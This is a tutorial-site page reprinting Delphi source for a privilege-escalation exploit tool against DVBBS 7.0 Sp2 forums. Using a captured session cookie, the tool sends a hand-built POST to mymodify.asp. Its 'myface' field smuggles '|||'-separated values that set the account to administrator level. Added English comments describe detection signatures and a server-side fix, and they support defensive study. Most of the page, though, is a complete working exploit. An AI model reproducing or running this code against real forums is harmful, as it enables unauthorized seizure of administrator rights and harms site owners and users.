DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码_漏洞研究教程-查字典教程网
DVBBS7.0Sp2前台提权漏洞利用程序[Kendy版]源码
发布时间:2016-12-26 来源:查字典编辑

作者:Kendy 文章来源:Kendy’s Blog

unitUnit1;

interface

uses

Windows,Messages,SysUtils,Variants,Classes,Graphics,Controls,Forms,

Dialogs,ScktComp,StdCtrls,ComCtrls,WinSkinData,ShellApi;

type

// TForm1 is the tool's only form. It wires three text inputs, one button and a
// TClientSocket (ScktComp) together; all protocol work is done in the event
// handlers declared below.
// NOTE(review): this listing is reproduced as published. The page extraction
// dropped whitespace between tokens and replaced ASCII quotes with typographic
// ones, so the text is a reading copy rather than compilable source.
TForm1=class(TForm)

// Captions for Label1..Label3 live in the .dfm, which is not shown here.
Label1:TLabel;

Label2:TLabel;

Label3:TLabel;

// Forum address (read into sUrl by Button1Click).
Edit1:TEdit;

// Forum account name (read into sUsername by Button1Click).
Edit2:TEdit;

// Session cookie captured by the operator (read into sCookie by Button1Click).
Edit3:TEdit;

Button1:TButton;

// Raw TCP client used to send the hand-built HTTP request.
ClientSocket1:TClientSocket;

GroupBox1:TGroupBox;

// Receives the text of the server response (set in ClientSocket1Read).
Memo1:TMemo;

// Shows the success / failure verdict (set in ClientSocket1Read).
Label4:TLabel;

// First panel is used for progress and validation messages.
StatusBar1:TStatusBar;

// Comes from the WinSkinData unit listed in the uses clause; presumably UI skinning only.
SkinData1:TSkinData;

// Validates input, builds the request and opens the socket.
procedureButton1Click(Sender:TObject);

// Sends the prepared request once the socket is connected.
procedureClientSocket1Connect(Sender:TObject;

Socket:TCustomWinSocket);

// Inspects the response text for the forum's success message.
procedureClientSocket1Read(Sender:TObject;Socket:TCustomWinSocket);

// Suppresses socket exceptions and shows a generic error.
procedureClientSocket1Error(Sender:TObject;Socket:TCustomWinSocket;

ErrorEvent:TErrorEvent;varErrorCode:Integer);

// Opens a hard-coded URL when the form is closed.
procedureFormClose(Sender:TObject;varAction:TCloseAction);

private

{Privatedeclarations}

public

{Publicdeclarations}

end;

var

// The form instance for this unit.
Form1:TForm1;

// Unit-level buffer holding the complete HTTP request. It is assembled in
// TForm1.Button1Click and transmitted unchanged in TForm1.ClientSocket1Connect,
// so the two handlers communicate only through this global.
Data:string;

implementation

{$R*.dfm}

// Button1Click: checks that the three inputs are filled in, splits the forum
// address into host and path, assembles one raw HTTP/1.1 POST into the global
// Data and opens ClientSocket1 to port 80. The actual send happens in
// ClientSocket1Connect.
//
// What the request looks like on the wire (useful for log review and IDS rules):
//  - target: <forum path>/mymodify.asp?action=updat&username=<account>, sent
//    with the operator's own session cookie, i.e. an authenticated request
//    from an ordinary account;
//  - the myface form field carries a long run of '|||'-separated values that
//    includes the literal for "administrator" and level10.gif;
//  - fixed values that never change between runs: the User-Agent string below,
//    Content-Length 585, the embedded address 210.41.235.200 and the token
//    9pc722664t5w7IM7 inside the body.
//
// NOTE(review): the server side is not shown on this page. Presumably the forum
// stores several user attributes in one '|||'-delimited value and accepts the
// delimiter inside a profile field; confirm against the DVBBS source. On that
// assumption the fix belongs on the server: reject or encode '|||' in
// user-supplied profile fields, never derive group or privilege attributes
// from client-submitted data, and apply the vendor's update.
procedureTForm1.Button1Click(Sender:TObject);

var

sUrl,sUsername,sPOST,sReferer,sHost,sCookie,S:string;

i:integer;

begin

// Drop any connection left open by a previous click.
ClientSocket1.Close;

// Each empty input aborts with a prompt in the status bar.
// Message: "Please enter the forum address!"
ifedit1.Text=’’then

begin

StatusBar1.Panels[0].Text:=’请输入论坛地址!’;

exit;

end;

// Message: "Please enter your forum account!"
ifedit2.Text=’’then

begin

StatusBar1.Panels[0].Text:=’请输入你的论坛账号!’;

exit;

end;

// Message: "Please enter the captured cookie!"
ifedit3.Text=’’then

begin

StatusBar1.Panels[0].Text:=’请输入抓取的Cookie!’;

exit;

end;

// Reset the result widgets from any earlier run.
memo1.Text:=’’;

StatusBar1.Panels[0].Text:=’’;

Label4.Caption:=’’;

sUrl:=edit1.Text;

// Strip the scheme so sUrl is host[/path].
ifPos(’http://’,sUrl)<>0then

sUrl:=StringReplace(sUrl,’http://’,’’,[rfIgnoreCase]);

sUsername:=edit2.Text;

sCookie:=edit3.Text;

//--------Host-------------

// Host is everything before the first '/', or the whole string if there is none.
i:=Pos(’/’,sUrl);

ifi<>0then

sHost:=Copy(sUrl,0,i-1)

else

sHost:=sUrl;

//--------Referer-----------

// The Referer is set to the forum's own profile page. Any client can set this
// header, so a Referer comparison on the server does not authenticate where a
// request came from.
sReferer:=’http://’+sUrl+’/mymodify.asp’;

//--------POST--------------

// Path = address with the host removed, plus the profile-update endpoint.
// The account name is concatenated as typed, without URL-encoding.
sPost:=StringReplace(sUrl,sHost,’’,[rfIgnoreCase]);

sPost:=sPost+’/mymodify.asp?action=updat&username=’+sUsername;

//--------Request body------------

// Fixed form body, built in six pieces. The myface value is where the
// '|||'-separated run is placed; the remaining fields are ordinary
// profile-form parameters left empty or at fixed values.
S:=’sex=1&face=Images%2Fuserface%2Fimage1.gif&myface=images/userface/image1.gif|||32|||32|||2003-12-30%’;

S:=S+’2016:34:00|||2005-6-19%2018:04:06|||25|||0|||管理员|||1||||||120|||115|||28|||0||||||210.41.235.200|||’;

S:=S+’0|||0|||0||||||0||||||level10.gif||||||9pc722664t5w7IM7|||0|0|0||||||Dvbbs&width=100&height=100’;

S:=S+’&birthday=&userphoto=&GroupName=%CE%DE%C3%C5%CE%DE%C5%C9&Signature=&showRe=0&usercookies=1&setuserinfo’;

S:=S+’=1&setusertrue=0&realname=&personal=&country=&userphone=&address=&province=&selectp=0&city=&selectc=0’;

S:=S+’&shengxiao=&blood=&belief=&occupation=&marital=&education=&college=&Submit=%B8%FC+%D0’;

// Request line and headers, each terminated with CRLF.
Data:=’POST’+sPost+’HTTP/1.1’+#13#10;

Data:=Data+’Accept:image/gif,image/x-xbitmap,image/jpeg,image/pjpeg,application/vnd.ms-excel,application/msword,application/x-shockwave-flash,*/*’+#13#10;

Data:=Data+’Referer:’+sReferer+#13#10;

Data:=Data+’Accept-Language:zh-cn’+#13#10;

Data:=Data+’Content-Type:application/x-www-form-urlencoded’+#13#10;

Data:=Data+’Accept-Encoding:gzip,deflate’+#13#10;

Data:=Data+’User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;Maxthon;TencentTraveler)’+#13#10;

Data:=Data+’Host:’+sHost+#13#10;

// Content-Length is a fixed literal; it is not computed from S.
Data:=Data+’Content-Length:585’+#13#10;

Data:=Data+’Connection:Keep-Alive’+#13#10;

Data:=Data+’Cache-Control:no-cache’+#13#10;

// The session cookie is copied verbatim into the header; the extra CRLF ends
// the header section. The connection is plain HTTP on port 80, so the cookie
// travels unencrypted.
Data:=Data+’Cookie:’+sCookie+#13#10+#13#10;

Data:=Data+S;

//--------Start sending the packet-------------

ClientSocket1.Host:=sHost;

ClientSocket1.Port:=80;

// Open starts the connection; Data is sent from ClientSocket1Connect.
ClientSocket1.Open;

// Message: "Sending data..."
StatusBar1.Panels[0].Text:=’数据发送中...’;

end;

// ClientSocket1Connect: connect handler for ClientSocket1. Sends the request
// text that Button1Click stored in the unit-level Data variable, in a single
// SendText call. Nothing is rebuilt or validated here.
procedureTForm1.ClientSocket1Connect(Sender:TObject;

Socket:TCustomWinSocket);

begin

Socket.SendText(Data);

end;

// ClientSocket1Read: read handler for ClientSocket1. Copies the received text
// into Memo1 and decides success or failure purely by searching that text for
// the forum's confirmation message.
//
// For incident response, the matching server-side evidence would be a POST to
// mymodify.asp answered with this confirmation page, followed by a change in
// the account's group or level. NOTE(review): verify the stored user record
// itself; the tool only looks at the response text.
procedureTForm1.ClientSocket1Read(Sender:TObject;

Socket:TCustomWinSocket);

begin

// Each read event replaces the memo content, so only the text returned by
// this ReceiveText call is examined below.
memo1.Text:=Socket.ReceiveText;

// Searched text: "Your modified information has been submitted successfully".
ifPos(’您的修改信息已成功提交’,memo1.Text)<>0then

begin

// Caption: "Successfully promoted to front-end administrator!"
Label4.Caption:=’>>成功提升为前台管理员!’;

// Status: "Success, please log in to the forum again!"
StatusBar1.Panels[0].Text:=’成功,请重新登陆论坛!’;

end

else

begin

// Caption: "Sorry, privilege escalation failed".
Label4.Caption:=’>>Sorry,提权失败’;

// Status: "Failed, try another forum."
StatusBar1.Panels[0].Text:=’失败,换个论坛试试。’;

end;

end;

// ClientSocket1Error: error handler for ClientSocket1. Every socket error,
// whatever its ErrorEvent kind or code, is reduced to the same generic
// status-bar text; the original code is discarded.
procedureTForm1.ClientSocket1Error(Sender:TObject;

Socket:TCustomWinSocket;ErrorEvent:TErrorEvent;

varErrorCode:Integer);

begin

// Setting the var parameter to 0 tells the ScktComp socket component not to
// raise an ESocketError exception for this error.
ErrorCode:=0;

StatusBar1.Panels[0].Text:=’Error.....’;

// Last statement of the handler; this Exit has no further effect.
Exit;

end;

// FormClose: close handler for the form. Asks the Windows shell to open a
// hard-coded URL with the 'open' verb, then lets the form close (Action is
// left unchanged).
// Analysts handling a build of this tool should expect this outbound browser
// launch when the window is closed and account for it in sandbox traffic.
procedureTForm1.FormClose(Sender:TObject;varAction:TCloseAction);

begin

ShellExecute(Handle,’open’,’http://aliwy.77169.com’,nil,nil,SW_SHOW);

end;

end.
